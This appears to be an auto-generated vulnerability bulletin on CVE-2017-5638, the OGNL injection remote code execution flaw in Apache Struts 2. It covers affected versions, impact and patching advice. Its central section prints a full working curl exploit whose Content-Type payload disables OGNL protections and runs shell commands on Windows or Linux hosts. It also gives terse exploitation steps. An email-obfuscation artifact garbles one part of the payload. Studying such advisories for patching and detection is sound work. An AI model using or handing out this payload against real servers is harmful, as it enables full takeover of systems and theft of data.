Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in a file upload request, the parser attempts to construct an error message by evaluating the header’s value. This evaluation uses Object-Graph Navigation Language (OGNL) expressions without proper sanitization. An attacker can craft a Content-Type header containing a malicious OGNL expression. Because the Struts framework interprets this expression on the server-side, it allows the attacker to achieve Remote Code Execution (RCE) with the privileges of the Struts application server. This bypasses all security controls and grants direct command execution on the underlying host, simply by submitting a specially crafted HTTP request.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target-host/upload.action

How Exploit:

Craft malicious Content-Type header.

Target vulnerable Struts endpoint.

OGNL expression executes commands.

Gains full server control.

Protection from this CVE

Apply Struts patch immediately.

Upgrade to versions 2.3.32 or 2.5.10.1.

Implement WAF filtering rules.

Disable file upload functionality if unused.

Impact:

Complete system compromise.

Arbitrary code execution.

Data theft and manipulation.

Server becomes part of botnet.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top